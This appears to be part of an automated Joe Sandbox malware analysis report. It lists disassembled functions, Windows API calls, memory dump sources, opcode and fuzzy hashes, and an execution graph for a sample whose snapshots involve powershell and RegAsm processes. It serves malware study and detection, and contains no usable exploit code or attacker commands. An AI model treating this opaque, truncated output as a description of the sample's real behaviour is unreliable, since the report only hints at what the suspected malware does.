                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$AllocReadSizeVirtual
                                                                                                                                                                                                • String ID: Could not read from source file ($Insufficient memory for the task
                                                                                                                                                                                                • API String ID: 967803350-3980496045
                                                                                                                                                                                                • Opcode ID: 361389ceb0d81f2fe474a5252a2bc9bb17e14d3400f0b81ad54a6f48d42cea67
                                                                                                                                                                                                • Instruction ID: e350f4d233708fb6966c721b399d91377452521602d9de5ad7b6587024b0bb36
                                                                                                                                                                                                • Opcode Fuzzy Hash: 361389ceb0d81f2fe474a5252a2bc9bb17e14d3400f0b81ad54a6f48d42cea67
                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF0A03075024076E7302B329D02B5529A1BB84B54F28013BF305BA1F6D6BC6C91C61E
                                                                                                                                                                                                Function 00401EE5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00409060,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00000100,00000000,00000000,00000000,00000000,?,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00000100,00000000,00000000), ref: 00401F36
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00409060,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00000100,00000000,00000000,00000000,00000000,?,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00000100,00000000,00000000), ref: 00401F3B
                                                                                                                                                                                                • CompareStringA.KERNEL32(00000000,00000000,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,000000FF,00000000,00000000,00409060,000000FF,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00000100,00000000,00000000,00000000,00000000), ref: 00401F59
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw, xrefs: 00401F09, 00401F17, 00401F2E, 00401F40, 00401F47, 00401F50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWide$CompareString
                                                                                                                                                                                                • String ID: Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw
                                                                                                                                                                                                • API String ID: 376665442-152093275
                                                                                                                                                                                                • Opcode ID: e9cd62a1cc75ef7a62fef9e9c5d73499481a5da4a562f75fcaaa3ec040a3af89
                                                                                                                                                                                                • Instruction ID: 8234609efcf1f537829582d910eb295a15ad1ed9929893014ce334202a71b21f
                                                                                                                                                                                                • Opcode Fuzzy Hash: e9cd62a1cc75ef7a62fef9e9c5d73499481a5da4a562f75fcaaa3ec040a3af89
                                                                                                                                                                                                • Instruction Fuzzy Hash: D401447028C30635F53166655D06F672459878AB36F34832BB674786FA9AFC688140AD
                                                                                                                                                                                                Function 004031B7 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateFileMappingW.KERNEL32(00000000,00000002,00000000,00000000,00000000,020F001B,-00000001,?,004033E5,004034EF), ref: 004031F1
                                                                                                                                                                                                • CreateFileMappingA.KERNEL32(00000000,00000002,00000000,00000000,00000000,020F001B), ref: 004031F9
                                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,004033E5,004034EF), ref: 00403214
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,020F001B,-00000001,?,004033E5,004034EF), ref: 00403252
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CreateMapping$CloseHandleView
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1446946243-0
                                                                                                                                                                                                • Opcode ID: 89f6a079cdcedbe1091520ededa12936d7633d7c0c43b1dea46c49fb90370fc6
                                                                                                                                                                                                • Instruction ID: c39f1e51f80209f6eb8eca5c1044a47fa3c5740b4c278728f47af4c11f40eee3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 89f6a079cdcedbe1091520ededa12936d7633d7c0c43b1dea46c49fb90370fc6
                                                                                                                                                                                                • Instruction Fuzzy Hash: DE2127716113009AD334DF25CE05B027EE9AB84712F24457FE2417A2E1C6BC7541CB6E
                                                                                                                                                                                                Function 00407F29 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetUserDefaultLangID.KERNEL32(00402AC0,000000F5,004028B5), ref: 00407F29
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,01000000,00002000,00000004,00402AC0,000000F5,004028B5), ref: 00407F42
                                                                                                                                                                                                • VirtualFree.KERNEL32(00010000,00004000,00000000,01000000,00002000,00000004,00402AC0,000000F5,004028B5), ref: 00407FB3
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00008000,00010000,00004000,00000000,01000000,00002000,00000004,00402AC0,000000F5,004028B5), ref: 00407FC5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Virtual$Free$AllocDefaultLangUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2341537525-0
                                                                                                                                                                                                • Opcode ID: e6e3aa048522eb41c06cc6b1baa54d44d467f0d0e8f73af485e17012c2fe9615
                                                                                                                                                                                                • Instruction ID: df932c746bd371959d07299e0fc956fba6b4b4d1168e236451ff45c58ada081f
                                                                                                                                                                                                • Opcode Fuzzy Hash: e6e3aa048522eb41c06cc6b1baa54d44d467f0d0e8f73af485e17012c2fe9615
                                                                                                                                                                                                • Instruction Fuzzy Hash: 15015270A583415AE725EB65EF0B7553EA25745709F10003FF3087A2E6C9BD2590875F

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00007FFD9B836605 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2621362482.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b830000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                                                                • Opcode ID: 54e2ca186f3281337282f169db932b693d2ba526c8d547f5d4f70fa832f05d67
                                                                                                                                                                                                • Instruction ID: 4e02c06a1a3c74f105d220f1629cce17babea95116e76c49e2c9aeb22b24789d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 54e2ca186f3281337282f169db932b693d2ba526c8d547f5d4f70fa832f05d67
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7D159B2A0FA8E4FEB69AB6C48744B57BE0EF19350B1901FED45DCB1E3D918A905C341
                                                                                                                                                                                                Function 00007FFD9B76644D Relevance: .7, Instructions: 720COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2620122911.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b760000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 17e765d9740a3b1cb32eb11f12f6667cc3f717de0ca548a4162eb4dad39b8582
                                                                                                                                                                                                • Instruction ID: cde4e92380984c89700f49ac1818fa95c157770eaed0712b1c1f349cf8801644
                                                                                                                                                                                                • Opcode Fuzzy Hash: 17e765d9740a3b1cb32eb11f12f6667cc3f717de0ca548a4162eb4dad39b8582
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BD18130A18A4D8FDF95DF5CC465AED7BE1FF68300F55426AD409D72A5CA34E881CB81
                                                                                                                                                                                                Function 00007FFD9B769F55 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2620122911.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b760000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9769f06fa93e93f245724c409b3a3784b7a1b285e3b8fe3f1526549499c08c42
                                                                                                                                                                                                • Instruction ID: e18a75f6bf2977c90113b945dd30c27375289a606b6ea2d7cd1a951cfb2e5145
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9769f06fa93e93f245724c409b3a3784b7a1b285e3b8fe3f1526549499c08c42
                                                                                                                                                                                                • Instruction Fuzzy Hash: 51519363F0B79A4FE7135BADDCB54E43B60EF51658B0902B3D4D88A0B3FD0825564782
                                                                                                                                                                                                Function 00007FFD9B64E620 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2618915474.00007FFD9B64D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B64D000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b64d000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 27be7311a7be5a5bf690d7c5f8a192ad682f276c1568982ab154235f62e24d33
                                                                                                                                                                                                • Instruction ID: c79eb34d46307a630406bc2c2684c82164629d0b1977d697d1e98546fe576027
                                                                                                                                                                                                • Opcode Fuzzy Hash: 27be7311a7be5a5bf690d7c5f8a192ad682f276c1568982ab154235f62e24d33
                                                                                                                                                                                                • Instruction Fuzzy Hash: E641277050EBC44FE7568B299855A523FF0EF56320F1901EFD0C8CB0A3D625A845C7A2
                                                                                                                                                                                                Function 00007FFD9B76977A Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2620122911.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b760000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5be9c55b64c6a5481a5fc70325564f290b0f23c34f0b768d36d16853d97d85c8
                                                                                                                                                                                                • Instruction ID: 3a581c5d6a31366e7541f0ed81e600b537650010124de97439b363d9788e7295
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5be9c55b64c6a5481a5fc70325564f290b0f23c34f0b768d36d16853d97d85c8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C31A13191CB4C9FDB189B5CA80A6B9BBE0FB99711F00422FE449D3251DA60A856CBC2
                                                                                                                                                                                                Function 00007FFD9B76A47C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2620122911.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b760000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: bfcde8187374af8f800d9fcb8a992df22c22ab90d79f70f41c26677f5766ec2f
                                                                                                                                                                                                • Instruction ID: 1c72aa9f9443e2edc7381a2ca24b9d75d1596539eb8a008187e7421124484f7c
                                                                                                                                                                                                • Opcode Fuzzy Hash: bfcde8187374af8f800d9fcb8a992df22c22ab90d79f70f41c26677f5766ec2f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D21283090CB4C8FDB59DBAC9C4A7E97FE0EB96321F04426BD048C3166DA74A416CB92
                                                                                                                                                                                                Function 00007FFD9B7633B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2620122911.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b760000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                • Instruction ID: 606a3e1d64f3f184d29538b399a082f5dcd9ff4372c83a7c912515896dbd522b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2301677121CB0C8FD748EF0CE451AA5B7E0FB95365F10056DE58AC36A5DA36E882CB46
                                                                                                                                                                                                Function 00007FFD9B83414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2621362482.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b830000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: cb1232c796d0e85c4a21d1f8d961a4c37ddceff213062f1b28dba9478381db54
                                                                                                                                                                                                • Instruction ID: f1cb9b077af0332432279eae2814b2f4fece185a35435f660657238fe10c88c0
                                                                                                                                                                                                • Opcode Fuzzy Hash: cb1232c796d0e85c4a21d1f8d961a4c37ddceff213062f1b28dba9478381db54
                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F0B432B0D9094FDB68EB4CE4518D877E0EF5832071500BAE05DC71B3CA25EC40C740
                                                                                                                                                                                                Function 00007FFD9B834400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2621362482.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b830000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: bda99ddc88e71c97262ff121409a2167c46bb4b8837c473f02122f98b576b5ce
                                                                                                                                                                                                • Instruction ID: 2ccb6dfecd982b43ac6b4c2c11419b309d9d1b5592a98461cebf4c3941bdd38a
                                                                                                                                                                                                • Opcode Fuzzy Hash: bda99ddc88e71c97262ff121409a2167c46bb4b8837c473f02122f98b576b5ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: A3F0BE32A0E5498FEBA4EB4CE4608A877E0FF0832075600BAE059C71A3DA26EC50C740
                                                                                                                                                                                                Function 00007FFD9B8341D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2621362482.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b830000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                • Instruction ID: 585ec3caf0cf4cdf2a5ccd245456338458df09984bb726fb38306844d3d01381
                                                                                                                                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 32E01A31B0C8088FDAB8DB4CE0519AD73E1EB9832171601BBD14EC7671CA26ED518B80

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00007FFD9B768BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000A.00000002.2620122911.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_7ffd9b760000_powershell.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: N_^4$N_^7$N_^F$N_^J
                                                                                                                                                                                                • API String ID: 0-3508309026
                                                                                                                                                                                                • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                                                                                                                • Instruction ID: b73374c40b2ca2ff9d62c7e6197b62871e5057a0e2a7c83ed0cea9d458f1717b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                                                                                                                                                • Instruction Fuzzy Hash: BC2129BB7081254ED3057BBCBD249ED3B41DFA423474502F2E2A9CB183EE1470868AC2

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 0000000140001140 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000000E.00000002.2607587489.0000000140000000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_140000000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
                                                                                                                                                                                                • Instruction ID: e76669c8f4f670c94b621c8b927ebc9d9c9485ce5bf3cc4b479e0f1cdb2a001a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 69feff347bfda074aa7f07e48b7f2b5744d9c7d3b152f021baa2038210904211
                                                                                                                                                                                                • Instruction Fuzzy Hash: B7B012B050030884E306AF13F8413C93660674C7C0F400000F70813372C67940404B10

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:9.1%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                Signature Coverage:1.6%
                                                                                                                                                                                                Total number of Nodes:1946
                                                                                                                                                                                                Total number of Limit Nodes:46
                                                                                                                                                                                                execution_graph 26471 969a34 26472 969a9e 26471->26472 26474 969a54 26471->26474 26473 969a80 free 26477 946464 26473->26477 26474->26472 26474->26473 26478 946475 FreeLibrary 26477->26478 26479 94647f free 26477->26479 26478->26479 26479->26474 26480 989b5d 26481 989b79 26480->26481 26482 989b61 fputs 26480->26482 26638 98057c 26481->26638 26637 942300 fputc 26482->26637 26495 989c61 26497 942130 malloc _CxxThrowException 26495->26497 26498 989c7d 26497->26498 26499 987414 malloc _CxxThrowException 26498->26499 26501 989c95 26498->26501 26499->26501 26500 943404 malloc _CxxThrowException free memmove 26502 989cd5 26500->26502 26501->26500 26503 9871ec malloc _CxxThrowException 26502->26503 26504 989d90 26503->26504 26505 943404 malloc _CxxThrowException free memmove 26504->26505 26506 989dee 26505->26506 26507 94ef70 8 API calls 26506->26507 26508 989e63 26507->26508 26509 943208 malloc _CxxThrowException 26508->26509 26510 989e70 26509->26510 26511 966be0 malloc _CxxThrowException 26510->26511 26512 989e7e 26511->26512 26513 989ed2 26512->26513 26514 966e08 84 API calls 26512->26514 26515 965458 417 API calls 26513->26515 26516 989eb1 26514->26516 26517 989f49 26515->26517 26516->26513 26518 989eb6 _CxxThrowException 26516->26518 26519 989f60 26517->26519 26520 98b1c8 7 API calls 26517->26520 26518->26513 26521 989fb1 26519->26521 26525 942300 fputc 26519->26525 26520->26519 26522 98a02c 26521->26522 26524 942300 fputc 26521->26524 26523 98a063 26522->26523 26526 98a03c fputs 26522->26526 26527 98a09e 26523->26527 26532 98a114 26523->26532 26533 98a077 fputs 26523->26533 26528 989fd4 26524->26528 26529 989f86 fputs 26525->26529 26531 9426a0 fputs 26526->26531 26527->26532 26535 98a0ac fputs 26527->26535 26536 98a0d3 26527->26536 26528->26522 26534 989fde fputs 26528->26534 26530 942300 fputc 26529->26530 26537 989f9e 26530->26537 26538 98a05b 26531->26538 26552 942300 fputc 26532->26552 26558 98a15c 26532->26558 26539 9426a0 fputs 26533->26539 26540 9426a0 fputs 26534->26540 26541 9426a0 fputs 26535->26541 26536->26532 26548 942300 fputc 26536->26548 26542 942320 14 API calls 26537->26542 26543 942300 fputc 26538->26543 26544 98a096 26539->26544 26545 989ffd 26540->26545 26546 98a0cb 26541->26546 26547 989fa9 26542->26547 26543->26523 26550 942300 fputc 26544->26550 26551 942300 fputc 26545->26551 26554 942300 fputc 26546->26554 26555 942300 fputc 26547->26555 26556 98a0e4 26548->26556 26549 98a320 free free 26557 966b58 free free 26549->26557 26550->26527 26560 98a005 fputs 26551->26560 26553 98a12c 26552->26553 26553->26558 26562 98a135 fputs 26553->26562 26554->26536 26555->26521 26556->26532 26563 98a0ed fputs 26556->26563 26564 98a347 free 26557->26564 26558->26549 26559 98a2e7 26558->26559 26565 98a18f 26558->26565 26561 942300 fputc 26559->26561 26566 9426a0 fputs 26560->26566 26568 98a2ef 26561->26568 26569 9426a0 fputs 26562->26569 26570 9426a0 fputs 26563->26570 26571 987968 free free free free 26564->26571 26565->26549 26576 98a1cd 26565->26576 26577 98a1a5 fputs 26565->26577 26567 98a024 26566->26567 26572 942300 fputc 26567->26572 26568->26549 26573 98a2f8 fputs 26568->26573 26574 98a154 26569->26574 26575 98a10c 26570->26575 26593 98a363 26571->26593 26572->26522 26579 9426a0 fputs 26573->26579 26580 942300 fputc 26574->26580 26581 942300 fputc 26575->26581 26578 98a1f3 fputs 26576->26578 26586 98a275 fputs 26576->26586 26582 9426a0 fputs 26577->26582 26584 9426a0 fputs 26578->26584 26583 98a317 26579->26583 26580->26558 26581->26532 26585 98a1c5 26582->26585 26587 942300 fputc 26583->26587 26588 98a213 26584->26588 26589 942300 fputc 26585->26589 26590 9426a0 fputs 26586->26590 26591 98a2e5 26587->26591 26592 942300 fputc 26588->26592 26589->26576 26597 98a295 26590->26597 26591->26549 26598 98a21b 26592->26598 26594 98a53d free 26593->26594 26602 98a528 free free 26593->26602 26595 98a55b 26594->26595 26596 98a58c free 26594->26596 26595->26596 26603 98a577 free free 26595->26603 26600 98a5ad 26596->26600 26599 942300 fputc 26597->26599 26598->26586 26601 98a225 fputs 26598->26601 26604 98a2a0 fputs 26599->26604 26606 98a5c5 26600->26606 